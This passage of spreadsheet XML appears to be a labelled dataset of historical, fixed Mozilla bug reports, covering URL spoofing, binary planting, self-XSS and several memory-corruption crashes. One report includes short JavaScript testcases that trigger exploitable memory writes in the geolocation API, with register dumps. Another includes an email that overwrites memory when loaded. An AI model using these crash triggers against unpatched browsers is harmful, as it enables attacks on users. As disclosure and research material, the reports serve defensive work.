      </c>
      <c r="S4507" t="inlineStr">
        <is>
          <t>mozilla22</t>
        </is>
      </c>
      <c r="T4507" t="n">
        <v>1</v>
      </c>
      <c r="U4507" t="n">
        <v>0</v>
      </c>
      <c r="V4507" t="n">
        <v>34</v>
      </c>
      <c r="W4507" t="inlineStr">
        <is>
          <t>http://www.shmoo.com/idn/
Observe that our presentation of both 'evil' and 'good' URIs is identical.
Then compare to Safari (which shows "www.xn--theshmogroup-bgk.com" instead of "www.theshmoogroup.com").
This is probably filed under the wrong component, but worth filing than not at all!</t>
        </is>
      </c>
      <c r="X4507" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4508">
      <c r="A4508" t="n">
        <v>204555</v>
      </c>
      <c r="B4508" t="inlineStr">
        <is>
          <t>2003-05-05 20:14:43 -0700</t>
        </is>
      </c>
      <c r="C4508" t="inlineStr">
        <is>
          <t>CA cert with unusual extension in email signature causes crash.</t>
        </is>
      </c>
      <c r="D4508" t="inlineStr">
        <is>
          <t>2004-03-25 20:30:36 -0800</t>
        </is>
      </c>
      <c r="E4508" t="n">
        <v>1</v>
      </c>
      <c r="F4508" t="n">
        <v>1</v>
      </c>
      <c r="G4508" t="n">
        <v>3</v>
      </c>
      <c r="H4508" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4508" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J4508" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K4508" t="inlineStr">
        <is>
          <t>3.8</t>
        </is>
      </c>
      <c r="L4508" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4508" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4508" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4508" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4508" t="inlineStr">
        <is>
          <t>[adt3][3.7.7][3.4.4]</t>
        </is>
      </c>
      <c r="Q4508" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4508" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4508" t="inlineStr">
        <is>
          <t>3.8.1</t>
        </is>
      </c>
      <c r="T4508" t="n">
        <v>1</v>
      </c>
      <c r="U4508" t="n">
        <v>0</v>
      </c>
      <c r="V4508" t="n">
        <v>53</v>
      </c>
      <c r="W4508" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.3) Gecko/20030312
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.3) Gecko/20030312
E-mails from Microsoft recently were required to go through an additional set of
SMTP relays in order to pass through virus filters.  When these e-mails are then
sent through a mailing list the number of Received: headers reaches 12 or more.
 We believe that a buffer is being overwritten while the mail is being
processed.  We do have not examined the overwrite to determine whether or not it
can be exploited.
Reproducible: Always
Steps to Reproduce:
Load this e-mail from an IMAP server with spam filtering on
Return-Path: &lt;owner-ietf-krb-wg@atalanta.ctd.anl.gov&gt;
Received: from atalanta.ctd.anl.gov (atalanta.ctd.anl.gov [146.137.194.4])
	by marionberry.cc.columbia.edu (8.12.8p1/8.12.8) with ESMTP id h3GHfBoN011793
	for &lt;jaltman@columbia.edu&gt;; Wed, 16 Apr 2003 13:41:11 -0400 (EDT)
Received: (from majordom@localhost)
      by atalanta.ctd.anl.gov (8.9.1a/8.9.1) id MAA28939
      for ietf-krb-wg-outgoing; Wed, 16 Apr 2003 12:38:55 -0500 (CDT)
Received: from hermes.ctd.anl.gov (localhost [127.0.0.1])
      by atalanta.ctd.anl.gov (8.9.1a/8.9.1) with ESMTP id MAA28932
      for &lt;ietf-krb-wg@achilles.ctd.anl.gov&gt;; Wed, 16 Apr 2003 12:38:52 -0500 (CDT)
Received: from hermes.ctd.anl.gov (localhost [127.0.0.1])
	by hermes.ctd.anl.gov (8.9.1a/8.9.1) with ESMTP id MAA29084
	for &lt;ietf-krb-wg@achilles.ctd.anl.gov&gt;; Wed, 16 Apr 2003 12:38:52 -0500 (CDT)
Received: from mailrelay.anl.gov (mailrelay.anl.gov [130.202.101.22])
	by hermes.ctd.anl.gov (8.9.1a/8.9.1) with ESMTP id MAA29081
	for &lt;ietf-krb-wg@anl.gov&gt;; Wed, 16 Apr 2003 12:38:52 -0500 (CDT)
Received: from localhost.localdomain (localhost [127.0.0.1])
	by localhost.ctd.anl.gov (Postfix) with ESMTP
	id 1D3CA5F0FE9; Wed, 16 Apr 2003 12:38:52 -0500 (CDT)
Received: from mail3.microsoft.com (mail3.microsoft.com [131.107.3.123])
	by mailrelay.anl.gov (Postfix) with ESMTP id 64C185F0FE9
	for &lt;ietf-krb-wg@anl.gov&gt;; Wed, 16 Apr 2003 12:38:51 -0500 (CDT)
Received: from INET-VRS-03.redmond.corp.microsoft.com ([157.54.5.27]) by
mail3.microsoft.com with Microsoft SMTPSVC(5.0.2195.6624);
	 Wed, 16 Apr 2003 10:38:50 -0700
Received: from 157.54.8.23 by INET-VRS-03.redmond.corp.microsoft.com (InterScan
E-Mail VirusWall NT); Wed, 16 Apr 2003 10:38:50 -0700
Received: from red-imc-02.redmond.corp.microsoft.com ([157.54.9.107]) by
inet-hub-01.redmond.corp.microsoft.com with Microsoft SMTPSVC(5.0.2195.5600);
	 Wed, 16 Apr 2003 10:38:50 -0700
Received: from win-imc-01.wingroup.windeploy.ntdev.microsoft.com ([157.54.0.39])
by red-imc-02.redmond.corp.microsoft.com with Microsoft SMTPSVC(5.0.2195.5600);
	 Wed, 16 Apr 2003 10:38:49 -0700
Received: from WIN-MSG-10.wingroup.windeploy.ntdev.microsoft.com
([157.54.12.81]) by win-imc-01.wingroup.windeploy.ntdev.microsoft.com with
Microsoft SMTPSVC(6.0.3788.0);
	 Wed, 16 Apr 2003 10:38:48 -0700
Content-class: urn:content-classes:message
Subject: RE: AES and SHA-1 timing 
MIME-Version: 1.0
Date: Wed, 16 Apr 2003 10:38:52 -0700
Content-Type: multipart/signed;
	boundary="----=_NextPart_000_0036_01C30404.5CBD5C80";
	micalg=SHA1;
	protocol="application/x-pkcs7-signature"
X-MimeOLE: Produced By Microsoft Exchange V6.5.6851.8
Message-ID:
&lt;91D7F2CEE3425A4A9D11311D09FCE2460196A80E@WIN-MSG-10.wingroup.windeploy.ntdev.microsoft.com&gt;
X-MS-Has-Attach: yes
Thread-Topic: AES and SHA-1 timing 
Thread-Index: AcMD7Dei7A27+tKGTXyn65BPsrcpAgAUjOUg
From: "Paul Leach" &lt;paulle@windows.microsoft.com&gt;
To: "Marcus Watts" &lt;mdw@umich.edu&gt;, &lt;ietf-krb-wg@anl.gov&gt;
X-OriginalArrivalTime: 16 Apr 2003 17:38:48.0461 (UTC) FILETIME=[0974DBD0:01C3043F]
X-Spam-Status: No, hits=-100.0 required=5.7
	tests=USER_IN_WHITELIST
	version=2.53
X-Spam-Checker-Version: SpamAssassin 2.53 (1.174.2.15-2003-03-30-exp)
Sender: owner-ietf-krb-wg@achilles.ctd.anl.gov
Precedence: bulk
X-Scanned-By: MIMEDefang 2.32 (www . roaringpenguin . com / mimedefang)
This is a multi-part message in MIME format.
------=_NextPart_000_0036_01C30404.5CBD5C80
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
I hope it is clear that the iteration count in the AES string-to-key
cipher suite can be precomputed by the KDC when the password is changed;
thus, it should not normally have any significant impact on KDC load.
(Unless you have a really high volume of password change operations.)
Finally, the iteration count is just the default -- it can be changed if
a large number of really slow machines are in one's environment, and if
the increased risk of password breakability can be accepted. 
------=_NextPart_000_0036_01C30404.5CBD5C80
Content-Type: application/x-pkcs7-signature;
	name="smime.p7s"
Content-Disposition: attachment;
	filename="smime.p7s"
Content-Transfer-Encoding: base64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------=_NextPart_000_0036_01C30404.5CBD5C80--
Actual Results:  
The results are unpredictable depending on the e-mail.  Memory is being
overwritten.  Sometimes mozilla crashes.  Sometimes it refuses to shutdown. 
Sometimes it becomes completely unresponsive.
Expected Results:  
mozilla should have downloaded the e-mail and allowed it to be read.</t>
        </is>
      </c>
      <c r="X4508" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4509">
      <c r="A4509" t="n">
        <v>589190</v>
      </c>
      <c r="B4509" t="inlineStr">
        <is>
          <t>2010-08-20 09:16:01 -0700</t>
        </is>
      </c>
      <c r="C4509" t="inlineStr">
        <is>
          <t>Binary planting potential in nsMIMEInfoWin::LaunchWithFile</t>
        </is>
      </c>
      <c r="D4509" t="inlineStr">
        <is>
          <t>2010-11-11 14:11:18 -0800</t>
        </is>
      </c>
      <c r="E4509" t="n">
        <v>1</v>
      </c>
      <c r="F4509" t="n">
        <v>1</v>
      </c>
      <c r="G4509" t="n">
        <v>3</v>
      </c>
      <c r="H4509" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4509" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4509" t="inlineStr">
        <is>
          <t>DOM: Navigation</t>
        </is>
      </c>
      <c r="K4509" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4509" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4509" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4509" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4509" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4509" t="inlineStr">
        <is>
          <t>[sg:critical?] [qa-ntd-191] [qa-ntd-192]</t>
        </is>
      </c>
      <c r="Q4509" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4509" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4509" t="inlineStr">
        <is>
          <t>mozilla2.0b5</t>
        </is>
      </c>
      <c r="T4509" t="n">
        <v>1</v>
      </c>
      <c r="U4509" t="n">
        <v>0</v>
      </c>
      <c r="V4509" t="n">
        <v>12</v>
      </c>
      <c r="W4509" t="inlineStr">
        <is>
          <t>This code &lt;http://mxr.mozilla.org/mozilla-central/source/uriloader/exthandler/win/nsMIMEInfoWin.cpp#142&gt; needs to use an absolute path.</t>
        </is>
      </c>
      <c r="X4509" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4510">
      <c r="A4510" t="n">
        <v>743475</v>
      </c>
      <c r="B4510" t="inlineStr">
        <is>
          <t>2012-04-07 15:00:33 -0700</t>
        </is>
      </c>
      <c r="C4510" t="inlineStr">
        <is>
          <t>WebGLBuffer::FindMaxUshortElement passes wrong template arguments to FindMaxElementInSubArray</t>
        </is>
      </c>
      <c r="D4510" t="inlineStr">
        <is>
          <t>2024-05-29 16:00:37 -0700</t>
        </is>
      </c>
      <c r="E4510" t="n">
        <v>1</v>
      </c>
      <c r="F4510" t="n">
        <v>1</v>
      </c>
      <c r="G4510" t="n">
        <v>3</v>
      </c>
      <c r="H4510" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4510" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4510" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K4510" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4510" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4510" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4510" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4510" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4510" t="inlineStr">
        <is>
          <t>[sg:high][qa!]</t>
        </is>
      </c>
      <c r="Q4510" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4510" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4510" t="inlineStr">
        <is>
          <t>mozilla14</t>
        </is>
      </c>
      <c r="T4510" t="n">
        <v>1</v>
      </c>
      <c r="U4510" t="n">
        <v>0</v>
      </c>
      <c r="V4510" t="n">
        <v>15</v>
      </c>
      <c r="W4510" t="inlineStr">
        <is>
          <t>Created attachment 613142
Fix the wrong template parameter in call to WebGLBuffer::FindMaxElementInSubArray
WebGLBuffer::FindMaxUshortElement in content/canvas/src/WebGLContext.h passes GLshort instead of GLushort to FindMaxElementInSubArray, even though only GLubyte or GLushort should be used.
I've attached a patch to fix the issue.</t>
        </is>
      </c>
      <c r="X4510" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4511">
      <c r="A4511" t="n">
        <v>605307</v>
      </c>
      <c r="B4511" t="inlineStr">
        <is>
          <t>2010-10-18 15:37:35 -0700</t>
        </is>
      </c>
      <c r="C4511" t="inlineStr">
        <is>
          <t>nsGeolocation::ClearWatch crash</t>
        </is>
      </c>
      <c r="D4511" t="inlineStr">
        <is>
          <t>2011-01-27 17:30:07 -0800</t>
        </is>
      </c>
      <c r="E4511" t="n">
        <v>1</v>
      </c>
      <c r="F4511" t="n">
        <v>1</v>
      </c>
      <c r="G4511" t="n">
        <v>2</v>
      </c>
      <c r="H4511" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4511" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J4511" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4511" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4511" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4511" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N4511" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4511" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4511" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q4511" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4511" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4511" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4511" t="n">
        <v>1</v>
      </c>
      <c r="U4511" t="n">
        <v>0</v>
      </c>
      <c r="V4511" t="n">
        <v>11</v>
      </c>
      <c r="W4511" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b6) Gecko/20100101 Firefox/4.0b6
Build Identifier: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b6) Gecko/20100101 Firefox/4.0b6
Description:
Calling watchPosition on the geolocation object with an object as argument
followed by a clearWatch call leads to a crash. These crashes sometimes
show exploitable behaviour ( arbitray writes ).
Confirmed Versions:
-----------------------
	Firefox 4.0 beta 6
	Firefox 3.6.10
Testcase:
------------------------
Smallest testcase:
&lt;script&gt;
o3=navigator;
o7=new Error();
o15=o3.geolocation;
o15.watchPosition(o7);
try{o15.clearWatch(1);}catch(e){}
&lt;/script&gt;
More likely to show exploitable behaviour:
&lt;script&gt;
o3=navigator;
o7=new Error();
o15=o3.geolocation;
for(var x=0; x&lt;10;x++) o15.watchPosition(o7);
for(var x=0; x&lt;10;x++) try{o15.clearWatch(x+1);}catch(e){}
&lt;/script&gt;
Testcase Notes:
-----------------------
The testcase might need several reloads in the browser.
Stack Backtrace:
Linux:
eax            0xa5a5a5a5       -1515870811
ecx            0xb7db6ff4       -1210355724
edx            0x0      0
ebx            0xb7db6ff4       -1210355724
esp            0xbfffd4c0       0xbfffd4c0
ebp            0xbfffd4e8       0xbfffd4e8
esi            0xbfffd614       -1073752556
edi            0x1      1
eip            0xb6ceaac7       0xb6ceaac7 &lt;nsGeolocation::ClearWatch(int)+51&gt;
eflags         0x10286  [ PF SF IF RF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
=&gt; 0xb6ceaac7 &lt;_ZN13nsGeolocation10ClearWatchEi+51&gt;:    movb   $0x1,0x29(%eax)
   0xb6ceaacb &lt;_ZN13nsGeolocation10ClearWatchEi+55&gt;:    xor    %eax,%eax
   0xb6ceaacd &lt;_ZN13nsGeolocation10ClearWatchEi+57&gt;:    add    $0xc,%esp
Program received signal SIGSEGV, Segmentation fault.
nsGeolocation::ClearWatch (this=0xa7652b80, aWatchId=1) at /home/ubuntu/build/src/dom/src/geolocation/nsGeolocation.cpp:979
warning: Source file is more recent than executable.
979       mWatchingCallbacks[aWatchId]-&gt;MarkCleared();
#0  nsGeolocation::ClearWatch (this=0xa7652b80, aWatchId=1) at /home/ubuntu/build/src/dom/src/geolocation/nsGeolocation.cpp:979
#1  0xb757e9ab in NS_InvokeByIndex_P () from /home/ubuntu/build/debug/dist/bin/libxul.so
#2  0xb7018a8d in CallMethodHelper::Call() () from /home/ubuntu/build/debug/dist/bin/libxul.so
#3  0xb701288c in XPCWrappedNative::CallMethod (ccx=..., mode=XPCWrappedNative::CALL_METHOD)
    at /home/ubuntu/build/src/js/src/xpconnect/src/xpcwrappednative.cpp:2304
#4  0xb701f2eb in XPC_WN_CallMethod (cx=0xaec27000, obj=0xaaa39f90, argc=2862849936, argv=0xb21fd428, vp=0xb21fd508)
    at /home/ubuntu/build/src/js/src/xpconnect/src/xpcwrappednativejsops.cpp:1738
#5  0xb7710d2a in callJSNative (cx=0xaec27000, fun=&lt;value optimized out&gt;, script=0x0,
    native=0xb701f18c &lt;XPC_WN_CallMethod(JSContext*, JSObject*, unsigned int, jsval_layout*, jsval_layout*)&gt;, argsRef=..., flags=2)
Windows:
(1b5c.13b8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
xul!nsGeolocation::ClearWatch+0x1d:
5f12fde1 c6402501        mov     byte ptr [eax+25h],1       ds:002b:6c6d7853=6c
xul!nsGeolocation::ClearWatch+0x1d
xul!NS_InvokeByIndex_P+0x27
xul!XPC_WN_CallMethod+0x886
MOZCRT19!arena_dalloc+0x39
xul!js::MonitorLoopEdge+0x87f
xul!js::Interpret+0x24c0
xul!js::Execute+0x392
xul!JS_EvaluateUCScriptForPrincipals+0x59
xul!nsJSContext::EvaluateString+0x18a
xul!nsScriptLoader::EvaluateScript+0x17c
xul!nsScriptLoader::ProcessRequest+0xb2
xul!nsScriptLoader::ProcessScriptElement+0x2f3
xul!nsScriptElement::MaybeProcessScript+0x8c
xul!nsHTMLScriptElement::MaybeProcessScript+0x1e
xul!nsHTMLScriptElement::DoneAddingChildren+0xf
xul!nsHtml5TreeOpExecutor::RunScript+0x7f
xul!nsHtml5TreeOpExecutor::RunFlushLoop+0x2a1
xul!nsHtml5ExecutorReflusher::Run+0x11
xul!nsThread::ProcessNextEvent+0x17a
xul!mozilla::ipc::MessagePump::Run+0x6e
My reference #	  : d4f8755506e48534c2eb4dda39a054c1_1
VulnDev reference : vd10002
reported by nils of vulndev ltd.
Reproducible: Always
Steps to Reproduce:
1. save testcase to html file
2. load testcase
3. crash
Actual Results:  
crash
Expected Results:  
no crash</t>
        </is>
      </c>
      <c r="X4511" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4512">
      <c r="A4512" t="n">
        <v>497013</v>
      </c>
      <c r="B4512" t="inlineStr">
        <is>
          <t>2009-06-08 17:39:19 -0700</t>
        </is>
      </c>
      <c r="C4512" t="inlineStr">
        <is>
          <t>Crash [@ SinkContext::~SinkContext] with document.write in -moz-binding</t>
        </is>
      </c>
      <c r="D4512" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:48 -0700</t>
        </is>
      </c>
      <c r="E4512" t="n">
        <v>1</v>
      </c>
      <c r="F4512" t="n">
        <v>1</v>
      </c>
      <c r="G4512" t="n">
        <v>3</v>
      </c>
      <c r="H4512" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4512" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4512" t="inlineStr">
        <is>
          <t>DOM: HTML Parser</t>
        </is>
      </c>
      <c r="K4512" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4512" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4512" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N4512" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4512" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4512" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q4512" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4512" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4512" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4512" t="n">
        <v>1</v>
      </c>
      <c r="U4512" t="n">
        <v>0</v>
      </c>
      <c r="V4512" t="n">
        <v>12</v>
      </c>
      <c r="W4512" t="inlineStr">
        <is>
          <t>Created attachment 382212
zipped up testcase
See zipped up testcase, which crashes Firefox 3 and current trunk build, when visiting the file named 'testcase.htm', wait a little while and then press the back button.
Breakpad report for trunk:
http://crash-stats.mozilla.com/report/index/ded73808-0a0f-412e-ac81-deadc2090608
0  	mozcrt19.dll  	arena_dalloc_small  	 obj-firefox/memory/jemalloc/crtsrc/jemalloc.c:4425
1 	mozcrt19.dll 	arena_dalloc 	obj-firefox/memory/jemalloc/crtsrc/jemalloc.c:4548
2 	mozcrt19.dll 	free 	obj-firefox/memory/jemalloc/crtsrc/jemalloc.c:6387
3 	xul.dll 	SinkContext::~SinkContext 	content/html/document/src/nsHTMLContentSink.cpp:649
4 	xul.dll 	HTMLContentSink::~HTMLContentSink 	content/html/document/src/nsHTMLContentSink.cpp:1569
5 	xul.dll 	HTMLContentSink::`scalar deleting destructor' 	
6 	xul.dll 	HTMLContentSink::Release 	content/html/document/src/nsHTMLContentSink.cpp:1596
7 	nspr4.dll 	nspr4.dll@0x858f 
Breakpad report for Firefox3.0.x:
http://crash-stats.mozilla.com/report/index/946e6a17-c797-4ec9-953d-b95de2090608?p=1
0  	xul.dll  	SinkContext::FlushTags  	 mozilla/content/html/document/src/nsHTMLContentSink.cpp:1341
1 	xul.dll 	HTMLContentSink::DidBuildModel 	mozilla/content/html/document/src/nsHTMLContentSink.cpp:1811
2 	xul.dll 	CNavDTD::DidBuildModel 	mozilla/parser/htmlparser/src/CNavDTD.cpp:466
3 	xul.dll 	nsParser::DidBuildModel 	mozilla/parser/htmlparser/src/nsParser.cpp:1006</t>
        </is>
      </c>
      <c r="X4512" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4513">
      <c r="A4513" t="n">
        <v>567474</v>
      </c>
      <c r="B4513" t="inlineStr">
        <is>
          <t>2010-05-21 15:53:14 -0700</t>
        </is>
      </c>
      <c r="C4513" t="inlineStr">
        <is>
          <t>[k] Add 403 handler</t>
        </is>
      </c>
      <c r="D4513" t="inlineStr">
        <is>
          <t>2010-06-09 16:49:16 -0700</t>
        </is>
      </c>
      <c r="E4513" t="n">
        <v>1</v>
      </c>
      <c r="F4513" t="n">
        <v>1</v>
      </c>
      <c r="G4513" t="n">
        <v>5</v>
      </c>
      <c r="H4513" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4513" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J4513" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4513" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4513" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4513" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4513" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4513" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4513" t="inlineStr"/>
      <c r="Q4513" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4513" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4513" t="inlineStr">
        <is>
          <t>2.1</t>
        </is>
      </c>
      <c r="T4513" t="n">
        <v>1</v>
      </c>
      <c r="U4513" t="n">
        <v>0</v>
      </c>
      <c r="V4513" t="n">
        <v>11</v>
      </c>
      <c r="W4513" t="inlineStr">
        <is>
          <t>Since we're going to have ACL introduced (bug 561523), we'll need a 403 handler. This will probably be done through middleware, at least initially. There is a Django ticket [1] for which I'm advocating, but that probably won't land soon.
In the meantime, there is a plug-and-play alternative which I have tried [2]. It just needs some customizing to work with Jinja, should be quick and easy.
[1] http://code.djangoproject.com/ticket/5515
[2] http://github.com/wtanaka/django403</t>
        </is>
      </c>
      <c r="X4513" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4514">
      <c r="A4514" t="n">
        <v>1229426</v>
      </c>
      <c r="B4514" t="inlineStr">
        <is>
          <t>2015-12-01 09:46:09 -0800</t>
        </is>
      </c>
      <c r="C4514" t="inlineStr">
        <is>
          <t>"javascript:" scheme not removed for drag and drop, unlike pasting into the URL bar</t>
        </is>
      </c>
      <c r="D4514" t="inlineStr">
        <is>
          <t>2020-04-08 13:06:25 -0700</t>
        </is>
      </c>
      <c r="E4514" t="n">
        <v>1</v>
      </c>
      <c r="F4514" t="n">
        <v>1</v>
      </c>
      <c r="G4514" t="n">
        <v>2</v>
      </c>
      <c r="H4514" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4514" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J4514" t="inlineStr">
        <is>
          <t>Address Bar</t>
        </is>
      </c>
      <c r="K4514" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4514" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4514" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4514" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4514" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4514" t="inlineStr">
        <is>
          <t>[2016-GBT-Y][adv-main53+]</t>
        </is>
      </c>
      <c r="Q4514" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4514" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4514" t="inlineStr">
        <is>
          <t>Firefox 53</t>
        </is>
      </c>
      <c r="T4514" t="n">
        <v>1</v>
      </c>
      <c r="U4514" t="n">
        <v>0</v>
      </c>
      <c r="V4514" t="n">
        <v>14</v>
      </c>
      <c r="W4514" t="inlineStr">
        <is>
          <t>As an anti-self-XSS feature (where people are lured into hacking themselves, typically their social media accounts) we remove the javascript: scheme when people paste URLs into the Location bar. We should be doing the same for drag and drop, which is also used for the same kinds of self-xss attacks.
At least we don't execute the javascript: url when dropped so it's not terrible, but it leaves the victim one innocuous-sounding instruction ('hit return') away from the same result.</t>
        </is>
      </c>
      <c r="X4514" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4515">
      <c r="A4515" t="n">
        <v>19061</v>
      </c>
      <c r="B4515" t="inlineStr">
        <is>
          <t>1999-11-17 10:20:28 -0800</t>
        </is>
      </c>
      <c r="C4515" t="inlineStr">
        <is>
          <t>Raptor crashes when rendering table with thead/tfoot/tbody</t>
        </is>
      </c>
      <c r="D4515" t="inlineStr">
        <is>
          <t>2000-01-13 18:35:59 -0800</t>
        </is>
      </c>
      <c r="E4515" t="n">
        <v>1</v>
      </c>
      <c r="F4515" t="n">
        <v>1</v>
      </c>
      <c r="G4515" t="n">
        <v>3</v>
      </c>
      <c r="H4515" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4515" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4515" t="inlineStr">
        <is>
          <t>Layout: Tables</t>
        </is>
      </c>
      <c r="K4515" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4515" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4515" t="inlineStr">
        <is>
          <t>Windows 98</t>
        </is>
      </c>
      <c r="N4515" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4515" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4515" t="inlineStr"/>
      <c r="Q4515" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4515" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4515" t="inlineStr">
        <is>
          <t>M13</t>
        </is>
      </c>
      <c r="T4515" t="n">
        <v>1</v>
      </c>
      <c r="U4515" t="n">
        <v>0</v>
      </c>
      <c r="V4515" t="n">
        <v>7</v>
      </c>
      <c r="W4515" t="inlineStr">
        <is>
          <t>The referenced table uses thead/tbody/tfoot to group rows --
however, some of the cells in these rows span outside the defined
thead/tbody/tfoot groupings.  The result is that Raptor crashes
and burns (page fault in gkhtml.dll)
Obviously the renderer shouldn't crash ;-). On the other hand,
it is unclear to me how the table layout engine _should_ render
tables such as this (admittedly pathological) example, where the
row grouping elements group rows containing cells that span
outside the groups.
